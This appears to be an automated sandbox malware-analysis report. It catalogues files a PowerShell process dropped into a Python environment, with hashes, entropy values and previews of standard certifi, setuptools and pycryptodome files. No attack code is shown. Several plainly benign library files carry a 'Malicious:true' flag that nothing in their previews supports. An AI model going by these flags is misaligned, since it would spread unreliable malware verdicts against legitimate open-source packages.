                                                                                                                                                                                                                              Entropy (8bit):4.800678842548869
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:1REYBXyUzrIY3MTDyQdQAY0OXW6ah05gUQdByKj0ah05gv:1REYB3vIY3YyQnrOXAh05VQ6KZh05q
                                                                                                                                                                                                                              MD5:81C7899ED070F1D26338977374A4B853
                                                                                                                                                                                                                              SHA1:2627B47DA19BB2F2B8E7D25A5A57473C00C86550
                                                                                                                                                                                                                              SHA-256:CA7D073C74998CFFB501A2E6E1C99AF62F49272A5FDFB3527769E2A632DFE1A0
                                                                                                                                                                                                                              SHA-512:CF5299A774C61A0F84D6E1E4233F426CC9D854D809EEF0D6B1158EC0078E75C54C3141E835DC3D0F376B53EFB8DDE462B49B0A5093C63613B332617966F34D0C
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:from typing import Union, Optional....Buffer = Union[bytes, bytearray, memoryview]....def strxor(term1: bytes, term2: bytes, output: Optional[Buffer]=...) -> bytes: .....def strxor_c(term: bytes, c: int, output: Optional[Buffer]=...) -> bytes: .....
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):6002
                                                                                                                                                                                                                              Entropy (8bit):4.505529428560847
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:5IPveem/xBJCPrGXwiLfXsfnCUy01LOq6LIrqCWPANPuqlT69Frw:5IPGJ//oaEk0CNsrqoWe69lw
                                                                                                                                                                                                                              MD5:EE216AFD7A0D2615C3CACE29A68A11DB
                                                                                                                                                                                                                              SHA1:209A6EA81DD5625E2E9AE7503BB8B67738BB1FF1
                                                                                                                                                                                                                              SHA-256:4BF5B0BC8F8AF7CE7096E96F7167CF4F776F2CC0983F5C8F876CA780B3A67781
                                                                                                                                                                                                                              SHA-512:423205D351991FFCD4A852E25A6010CC8CCA0F7F5FB0EB20EF0E12CC6BCA9523CF86AD91047761F0CCE011ECEB65C8E7671F85184FF0283088997F61EC311AE7
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:# don't import any costly modules.import sys.import os...def warn_distutils_present():. if 'distutils' not in sys.modules:. return. import warnings.. warnings.warn(. "Distutils was imported before Setuptools, but importing Setuptools ". "also replaces the `distutils` module in `sys.modules`. This may lead ". "to undesirable behaviors or errors. To avoid these issues, avoid ". "using distutils directly, ensure that setuptools is installed in the ". "traditional way (e.g. not an editable install), and/or make sure ". "that setuptools is always imported before distutils.". )...def clear_distutils():. if 'distutils' not in sys.modules:. return. import warnings.. warnings.warn("Setuptools is replacing distutils."). mods = [. name. for name in sys.modules. if name == "distutils" or name.startswith("distutils."). ]. for name in mods:. del sys.modules[name]...def enabled():. """
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):9831
                                                                                                                                                                                                                              Entropy (8bit):5.117118153765363
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:3PE5v00S07nlI0UaegHgJba6imDSFoq5nlRaX+KN/7MBdNV2tY09:3yv+4nOaNHgEmDSOq5nlR++KN/7M5V2n
                                                                                                                                                                                                                              MD5:69C95A12868A842FAA39349AAD9CD838
                                                                                                                                                                                                                              SHA1:2882D883F20691F63DE440E4D56A12069216D0FD
                                                                                                                                                                                                                              SHA-256:C2ABB2E4285678D879E0D4EA4F294B4D32AFBE55873D58D4EABBA5D04A0E6DAF
                                                                                                                                                                                                                              SHA-512:AA7AF30DD1C9BACE6DBEC023A5F17515903D4F654026249430AF3E4C9E5C9B0A4187D128228477662B3FC36E55880DB9675494FE4AC1E01A25347EB43E608E29
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........w.Vfr...............................d.d.l.Z.d.d.l.Z.d...Z.d...Z.d...Z.d...Z.d...Z...G.d...d.........Z...G.d...d.........Z.e.j...................D.]...Z...e.e.d.e.....e.j...................................e.........Z.d...Z...G.d...d.........Z.d...Z.d...Z.e.j$..................d.k...r.e.Z.y.y.)......Nc.....................T.....d.t.........j...................v.r.y.d.d.l.}.|.j...................d...........y.).N..distutilsr....a....Distutils was imported before Setuptools, but importing Setuptools also replaces the `distutils` module in `sys.modules`. This may lead to undesirable behaviors or errors. To avoid these issues, avoid using distutils directly, ensure that setuptools is installed in the traditional way (e.g. not an editable install), and/or make sure that setuptools is always imported before distutils.)...sys..modules..warnings..warn).r....s.... .IC:\Users\xbov\Desktop\pyops\Lib\site-packages\_distutils_hack/__init__.py..warn_distutils_presentr........s%.........#.+.+..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):271
                                                                                                                                                                                                                              Entropy (8bit):4.702896409397793
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:hmJ/0N/gk1Ek7/q68y+K+p4/5jDw52KNdArQzT+RT7caftyXtn:hfVg7AZ8y+KC4/ZzKNdn+RT4aly9n
                                                                                                                                                                                                                              MD5:BDF8EE183920B4F932F71062B381E490
                                                                                                                                                                                                                              SHA1:B588405D458B45350E03361E40AB10672AD82381
                                                                                                                                                                                                                              SHA-256:A1DBF59388D9767A4F8F9FBA6D47FAD2E9A04F5A9BF1143A1C9BC778FC766868
                                                                                                                                                                                                                              SHA-512:EB6F9E75AB60C8A81AA0221F370C91D8CE28BDCCD25DD5ACBE086A0109AE3686D6F05C959515BECCACBEA059CAB0931F7AABB557B3D3693A122AD23E64C4620A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........w.Vf,.........................0.......e.d.........j.............................y.)..._distutils_hackN)...__import__..do_override........IC:\Users\xbov\Desktop\pyops\Lib\site-packages\_distutils_hack/override.py..<module>r........s....................)..)..+r....
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):44
                                                                                                                                                                                                                              Entropy (8bit):4.171453562658727
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:5QW6BMW2y+CBhTEu:+96W2y+4hx
                                                                                                                                                                                                                              MD5:012A3E19D518D130A36BEAF917A091C7
                                                                                                                                                                                                                              SHA1:358F87C599947263E8ADF079CB2131A522876AF8
                                                                                                                                                                                                                              SHA-256:12EFECF8D17A5486780AA774B5B6C0E70B56932D8864F35DF1EB7A18BB759B3A
                                                                                                                                                                                                                              SHA-512:76D17C1246B920B7E71F196876A2FCD6A3E102F10933CAC558DD993B6AA794766D657B85E0A7E56A71DF5F14C2F95A9E6576D81163509BB42DEC0FC0E49B9998
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:__import__('_distutils_hack').do_override().
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4
                                                                                                                                                                                                                              Entropy (8bit):1.5
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Mn:M
                                                                                                                                                                                                                              MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                              SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                              SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                              SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:pip.
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):989
                                                                                                                                                                                                                              Entropy (8bit):5.027120368969846
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:gWAJJ4J70RRrZNCeZi3vN8kg4ahrmZBzCP07U5:BAn4JQrru9fctOBmP0W
                                                                                                                                                                                                                              MD5:11618CB6A975948679286B1211BD573C
                                                                                                                                                                                                                              SHA1:3B4D48F29780C79B4484B1B3979544766B626FDB
                                                                                                                                                                                                                              SHA-256:E93716DA6B9C0D5A4A1DF60FE695B370F0695603D21F6F83F053E42CFC10CAF7
                                                                                                                                                                                                                              SHA-512:B947088E27B8420A4F69088D3FA9CE0B9BD0AC142783D01A3E8A762382F8A9EDEF68C9E34E54230EB9F86C53C8F2F44C9FE327257B5631021B23FE9D21E08E4C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:This package contains a modified version of ca-bundle.crt:..ca-bundle.crt -- Bundle of CA Root Certificates..This is a bundle of X.509 certificates of public Certificate Authorities.(CA). These were automatically extracted from Mozilla's root certificates.file (certdata.txt). This file can be found in the mozilla source tree:.https://hg.mozilla.org/mozilla-central/file/tip/security/nss/lib/ckfw/builtins/certdata.txt.It contains the certificates in PEM format and therefore.can be directly used with curl / libcurl / php_curl, or with.an Apache+mod_ssl webserver for SSL client authentication..Just configure this file as the SSLCACertificateFile.#..***** BEGIN LICENSE BLOCK *****.This Source Code Form is subject to the terms of the Mozilla Public License,.v. 2.0. If a copy of the MPL was not distributed with this file, You can obtain.one at http://mozilla.org/MPL/2.0/...***** END LICENSE BLOCK *****.@(#) $RCSfile: certdata.txt,v $ $Revision: 1.80 $ $Date: 2011/11/03 15:11:58 $.
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2170
                                                                                                                                                                                                                              Entropy (8bit):4.978784258696462
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:DfscqC4FaMLiPktj+XHzAaBZhYRG+qLcUydytw:DfRqnFaMmPktj+XTQTq3Aytw
                                                                                                                                                                                                                              MD5:7D2D5143CEC7B524AE326AE6C76BCA94
                                                                                                                                                                                                                              SHA1:C81C46283CB09EEDF350D318187CB4BBDFCD2E15
                                                                                                                                                                                                                              SHA-256:D67A2B78B4428693A07928F4B894F599E862065F27821DF71AE73B29DBF36183
                                                                                                                                                                                                                              SHA-512:EBB71A453C9F3B7894893361AADFFC8317470429736A4DC7A6C90937FB65DC67DF85CD1DDA1C1C6E15483F6868E5EF5B3F5FA1B1E8A9809FB240191B059B5FE0
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:Metadata-Version: 2.1.Name: certifi.Version: 2024.2.2.Summary: Python package for providing Mozilla's CA Bundle..Home-page: https://github.com/certifi/python-certifi.Author: Kenneth Reitz.Author-email: me@kennethreitz.com.License: MPL-2.0.Project-URL: Source, https://github.com/certifi/python-certifi.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: Mozilla Public License 2.0 (MPL 2.0).Classifier: Natural Language :: English.Classifier: Programming Language :: Python.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3 :: Only.Classifier: Programming Language :: Python :: 3.6.Classifier: Programming Language :: Python :: 3.7.Classifier: Programming Language :: Python :: 3.8.Classifier: Programming Language :: Python :: 3.9.Classifier: Programming Language :: Python :: 3.10.Classifier: Programming Language :: Python :: 3.11.Requires-Python: >=3.6.License-Fi
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:CSV text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1008
                                                                                                                                                                                                                              Entropy (8bit):5.795195011221646
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:Hq3n/2zDl3vxQ3JaLH3K3h3l29yq4Qp0p7nWjT0TqTKyoUV3qUndwYWJV:enuXtuJaLXeRl2UQpIL0FKYWJV
                                                                                                                                                                                                                              MD5:9AED91CB2395DF24222E5871C96A408D
                                                                                                                                                                                                                              SHA1:07FBC35D16804F1C8C8015A7A9846C2329B7382D
                                                                                                                                                                                                                              SHA-256:AEBC91A13D79076EBC2F78C59D85827E99155F4CEEE5243BB9943AA9DFF468BB
                                                                                                                                                                                                                              SHA-512:126AC1DFA741F7C726C543F5F43A51B7D05E4D723A25F76909EBD08DE1C2C00A9D8C8FBD16EC7F6BB8800BA40113D4C3F46FD91BB216B13F9FC3077737351E73
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:certifi-2024.2.2.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..certifi-2024.2.2.dist-info/LICENSE,sha256=6TcW2mucDVpKHfYP5pWzcPBpVgPSH2-D8FPkLPwQyvc,989..certifi-2024.2.2.dist-info/METADATA,sha256=1noreLRChpOgeSj0uJT1mehiBl8ngh33Guc7KdvzYYM,2170..certifi-2024.2.2.dist-info/RECORD,,..certifi-2024.2.2.dist-info/WHEEL,sha256=oiQVh_5PnQM0E3gPdiz09WCNmwiHDMaGer_elqB3coM,92..certifi-2024.2.2.dist-info/top_level.txt,sha256=KMu4vUCfsjLrkPbSNdgdekS-pVJzBAJFO__nI8NF6-U,8..certifi/__init__.py,sha256=ljtEx-EmmPpTe2SOd5Kzsujm_lUD0fKJVnE9gzce320,94..certifi/__main__.py,sha256=xBBoj905TUWBLRGANOcf7oi6e-3dMP4cEoG9OyMs11g,243..certifi/__pycache__/__init__.cpython-312.pyc,,..certifi/__pycache__/__main__.cpython-312.pyc,,..certifi/__pycache__/core.cpython-312.pyc,,..certifi/cacert.pem,sha256=ejR8qP724p-CtuR4U1WmY1wX-nVeCUD2XxWqj8e9f5I,292541..certifi/core.py,sha256=qRDDFyXVJwTB_EmoGppaXU_R9qCZvhl-EzxPMuV3nTA,4426..certifi/py.typed,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3h
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):92
                                                                                                                                                                                                                              Entropy (8bit):4.8343614255301075
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:RtEeX7MWcSlVlbY3KgP+tPCCfA5S:RtBMwlVCxWBBf
                                                                                                                                                                                                                              MD5:A227BF38FB17005B3BDB56CCC428B1BB
                                                                                                                                                                                                                              SHA1:502F95DA3089549E19C451737AA262E45C5BC3BC
                                                                                                                                                                                                                              SHA-256:A2241587FE4F9D033413780F762CF4F5608D9B08870CC6867ABFDE96A0777283
                                                                                                                                                                                                                              SHA-512:A0BA37A0B2F3D4AE1EE2B09BB13ED20912DB4E6A009FE9BA9414830AD4FDBF58571E195ABBE0D19F5582E2CF958CFB49FFDACD7C5182008699F92A0F5EEC6C41
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:Wheel-Version: 1.0.Generator: bdist_wheel (0.42.0).Root-Is-Purelib: true.Tag: py3-none-any..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8
                                                                                                                                                                                                                              Entropy (8bit):2.75
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:HZ:HZ
                                                                                                                                                                                                                              MD5:5EBD7F7C387EBB31C14E3C701023AC97
                                                                                                                                                                                                                              SHA1:BC5EA804A025DFFDE14FBF3746E34487196073D7
                                                                                                                                                                                                                              SHA-256:28CBB8BD409FB232EB90F6D235D81D7A44BEA552730402453BFFE723C345EBE5
                                                                                                                                                                                                                              SHA-512:7F2312A62A532E761DC45D0FF45FFE3FA599360AC0399D59EC8A39045C9E8CB62C912FC6C6F3A1C45ADBCAA10DDE77A8493567BB478839819C15F5FDD7E5C889
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:certifi.
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):94
                                                                                                                                                                                                                              Entropy (8bit):4.47695607525754
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:1LGzbQbAwLSkTRFo+HGip4TjLvf5n:1LcQbjrRJGA4Tfx
                                                                                                                                                                                                                              MD5:774241EC91CED8500EAD625928EAB55F
                                                                                                                                                                                                                              SHA1:3CB71B97C6BAD9D3A97727CC6694A59FC6CF32A4
                                                                                                                                                                                                                              SHA-256:963B44C7E12698FA537B648E7792B3B2E8E6FE5503D1F28956713D83371EDF6D
                                                                                                                                                                                                                              SHA-512:AD3F1FF2EE4EAACFE8A0F7840FCF88DFFA9820AAD649F271BDEED1A9C65E9248B1FB9B6C13826CE7BEAC4A53355DC49286C669985D05E5C6C72375153CF425B9
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:from .core import contents, where..__all__ = ["contents", "where"].__version__ = "2024.02.02".
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):243
                                                                                                                                                                                                                              Entropy (8bit):4.451797874382859
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:JW6yXBbjB2V+WuSZFeewrCy00y+0re6r/hu:JWfQYWuSZWFdQhu
                                                                                                                                                                                                                              MD5:269E7F0CA2FA570B10E690595E6AEDAB
                                                                                                                                                                                                                              SHA1:F09C4BA5E7EE37DDEBE914DEF9D97152CB5EB856
                                                                                                                                                                                                                              SHA-256:C410688FDD394D45812D118034E71FEE88BA7BEDDD30FE1C1281BD3B232CD758
                                                                                                                                                                                                                              SHA-512:01CA6DF3FB218B374BBA6653F5E72D6D6A9B07BB22215D5D96D2155DF037A9C6ED8D4F0FF8C789231A6C8C2555229700056FF6F740516F42F839E057FFF59F70
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:import argparse..from certifi import contents, where..parser = argparse.ArgumentParser().parser.add_argument("-c", "--contents", action="store_true").args = parser.parse_args()..if args.contents:. print(contents()).else:. print(where()).
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):289
                                                                                                                                                                                                                              Entropy (8bit):5.27585289594115
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:hytqAIvEG/RnCl7PfBRNeteuw52KNdArs3q4R6IaktyCOH:hmnfGW7hRNetecKNh3q4Rjakty7H
                                                                                                                                                                                                                              MD5:CF75D10207BBFB3482344E6803BA2D9C
                                                                                                                                                                                                                              SHA1:931684ECE3AE54D74E7AB8E37E8C8845D40477AE
                                                                                                                                                                                                                              SHA-256:AF27CF471C656E16791F9D3D2592570024266CD0FEE3856DB6C3C20478C0F6EA
                                                                                                                                                                                                                              SHA-512:68DF14C55C1E6CA8BE7A380A78E85A6CFFFF1115CCE124E516D3DD24F7B82C9774786C542160DDBF74203F861B2DDE97DD5F3B5FF9AA0E4DCEE86ED6C57FD0EC
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........w.Vf^......................... .....d.d.l.m.Z.m.Z...d.d.g.Z.d.Z.y.)......)...contents..wherer....r....z.2024.02.02N)...corer....r......__all__..__version__........AC:\Users\xbov\Desktop\pyops\Lib\site-packages\certifi/__init__.py..<module>r........s...........!....w..........r....
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):604
                                                                                                                                                                                                                              Entropy (8bit):4.9865738317843995
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:hlIs7ZJrsc3YWaaBMB6X/gV+y9ecKNh3uBask9wLuEG:hlR7ZJ4RC6B6XYLccKNh3Ff+BG
                                                                                                                                                                                                                              MD5:E3EFEC8A8B85F7ADE3166A280BCE26AC
                                                                                                                                                                                                                              SHA1:1F4E51AB924F21C9F2E33455194D36ECC5EF61A0
                                                                                                                                                                                                                              SHA-256:1E5C6B18F1F6C93A9F87F7E754F867D052F4705CCE6535BF5619B5DC606CDE15
                                                                                                                                                                                                                              SHA-512:4757E7F3F05B33513C0FB194D5A0765C7D5304259D23A104481B2A28180DB324882631B7F155BA7AE4E12EEDEFB67531CEEFCE580C3B6FC31E59E4C4A0B19DD0
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........w.Vf................................d.d.l.Z.d.d.l.m.Z.m.Z.....e.j...........................Z.e.j...................d.d.d.............e.j...........................Z.e.j...................r...e...e...................y...e...e...................y.)......N)...contents..wherez.-cz.--contents..store_true)...action)...argparse..certifir....r......ArgumentParser..parser..add_argument..parse_args..args..print........AC:\Users\xbov\Desktop\pyops\Lib\site-packages\certifi/__main__.py..<module>r........sX.............#.. .... .. .."............D.,.|.....<..................=.=....(.*.......%.'.Nr....
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3174
                                                                                                                                                                                                                              Entropy (8bit):4.883395753956105
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:h5gxcyaXhCslHgmNYVq+eYl2Ni2/gAddCtFv30iZ34M:rmR4hZ7NY43YMEqgvFM8d
                                                                                                                                                                                                                              MD5:B6D55BC1BFDACD437761096616313D8F
                                                                                                                                                                                                                              SHA1:700A2204343C933BE614B482ED69A75217780919
                                                                                                                                                                                                                              SHA-256:756213077481B51A2FF7993CAFCA3CFB7CF1A08B92B7935F94934D099DBCB183
                                                                                                                                                                                                                              SHA-512:2CD3B44236A08021B781425C9C91A2E108ABFBA6B37AC059B4F4E22CA2D256F50DC0FA4CC1A33AD3801CC5A3D891373B70AE7616665A1228A50E1A5E2A011246
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........w.VfJ.........................F.....d.Z.d.d.l.Z.d.d.l.Z.d.d...Z.e.j...................d.k\..r.d.d.l.m.Z.m.Z...d.a.d.a.d.e.f.d...Z.d.e.f.d...Z.y.e.j...................d.k\..r.d.d.l.m.Z.m.Z...d.a.d.a.d.e.f.d...Z.d.e.f.d...Z.y.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...e.e.j(..................e.f.....Z.e.e.d.f.....Z.....d.d.e.d.e.d.e.d.e.d.e.f.d...Z.d.e.f.d...Z.d.e.f.d...Z.y.).ze.certifi.py.~~~~~~~~~~..This module returns the installation location of cacert.pem or its contents.......N..returnc.....................2.....t.........j...................d.d.d...........y.).N)..._CACERT_CTX..__exit__........=C:\Users\xbov\Desktop\pyops\Lib\site-packages\certifi/core.py..exit_cacert_ctxr........s..................t.T..*r....)...........)...as_file..filesc...........................t..........Yt.........t.........d.........j...................d.................a.t.........t.........j...................................a.t.........j...................t...................t.........S...N..certifi..cacert.pe
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):292541
                                                                                                                                                                                                                              Entropy (8bit):6.048162209044241
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6144:QW1x/M8fRR1jplkXURrVADwYCuCigT/Q5MSRqNb7d8iu5NF:QWb/TRJLWURrI55MWavdF0D
                                                                                                                                                                                                                              MD5:D3E74C9D33719C8AB162BAA4AE743B27
                                                                                                                                                                                                                              SHA1:EE32F2CCD4BC56CA68441A02BF33E32DC6205C2B
                                                                                                                                                                                                                              SHA-256:7A347CA8FEF6E29F82B6E4785355A6635C17FA755E0940F65F15AA8FC7BD7F92
                                                                                                                                                                                                                              SHA-512:E0FB35D6901A6DEBBF48A0655E2AA1040700EB5166E732AE2617E89EF5E6869E8DDD5C7875FA83F31D447D4ABC3DB14BFFD29600C9AF725D9B03F03363469B4C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:.# Issuer: CN=GlobalSign Root CA O=GlobalSign nv-sa OU=Root CA.# Subject: CN=GlobalSign Root CA O=GlobalSign nv-sa OU=Root CA.# Label: "GlobalSign Root CA".# Serial: 4835703278459707669005204.# MD5 Fingerprint: 3e:45:52:15:09:51:92:e1:b7:5d:37:9f:b1:87:29:8a.# SHA1 Fingerprint: b1:bc:96:8b:d4:f4:9d:62:2a:a8:9a:81:f2:15:01:52:a4:1d:82:9c.# SHA256 Fingerprint: eb:d4:10:40:e4:bb:3e:c7:42:c9:e3:81:d3:1e:f2:a4:1a:48:b6:68:5c:96:e7:ce:f3:c1:df:6c:d4:33:1c:99.-----BEGIN CERTIFICATE-----.MIIDdTCCAl2gAwIBAgILBAAAAAABFUtaw5QwDQYJKoZIhvcNAQEFBQAwVzELMAkG.A1UEBhMCQkUxGTAXBgNVBAoTEEdsb2JhbFNpZ24gbnYtc2ExEDAOBgNVBAsTB1Jv.b3QgQ0ExGzAZBgNVBAMTEkdsb2JhbFNpZ24gUm9vdCBDQTAeFw05ODA5MDExMjAw.MDBaFw0yODAxMjgxMjAwMDBaMFcxCzAJBgNVBAYTAkJFMRkwFwYDVQQKExBHbG9i.YWxTaWduIG52LXNhMRAwDgYDVQQLEwdSb290IENBMRswGQYDVQQDExJHbG9iYWxT.aWduIFJvb3QgQ0EwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDaDuaZ.jc6j40+Kfvvxi4Mla+pIH/EqsLmVEQS98GPR4mdmzxzdzxtIK+6NiY6arymAZavp.xy0Sy6scTHAHoT0KMM0VjU/43dSMUBUc71DuxC73/OlS8pF94G3VNTCOXkNz
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4426
                                                                                                                                                                                                                              Entropy (8bit):4.499383603039266
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:+zn9FkdjbY7xDh07FkFDbq7LItY03xWtVwuZprf3:+zPkhGDh0BkpaIu03skun3
                                                                                                                                                                                                                              MD5:E41003E9791742059C2298D07A1E828B
                                                                                                                                                                                                                              SHA1:1F4014D3956D5773FAA402212DF114AC63168FFA
                                                                                                                                                                                                                              SHA-256:A910C31725D52704C1FC49A81A9A5A5D4FD1F6A099BE197E133C4F32E5779D30
                                                                                                                                                                                                                              SHA-512:BD979394AF16B7B62490ED580883763533121379428E8CE824C766B3AA0CD5FABD095BEBF76561C23BE14080446975B8198FED81F1FD401690D27B9BA06DE6E8
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:""".certifi.py.~~~~~~~~~~..This module returns the installation location of cacert.pem or its contents..""".import sys.import atexit..def exit_cacert_ctx() -> None:. _CACERT_CTX.__exit__(None, None, None) # type: ignore[union-attr]...if sys.version_info >= (3, 11):.. from importlib.resources import as_file, files.. _CACERT_CTX = None. _CACERT_PATH = None.. def where() -> str:. # This is slightly terrible, but we want to delay extracting the file. # in cases where we're inside of a zipimport situation until someone. # actually calls where(), but we don't want to re-extract the file. # on every call of where(), so we'll do it once then store it in a. # global variable.. global _CACERT_CTX. global _CACERT_PATH. if _CACERT_PATH is None:. # This is slightly janky, the importlib.resources API wants you to. # manage the cleanup of this file, so it doesn't actually return a. # path, it retu
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1623
                                                                                                                                                                                                                              Entropy (8bit):5.323138942576867
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:puqAQwyptdi1RLhwwl1/DfV8Vgja5HlN8aB:puqAQw9q21/DfV8Sa2aB
                                                                                                                                                                                                                              MD5:A99E49E46791D457E956314E73C8BCD2
                                                                                                                                                                                                                              SHA1:8EFCCB21F10F9CCAAC0FF8D5A09DC0BBD260535A
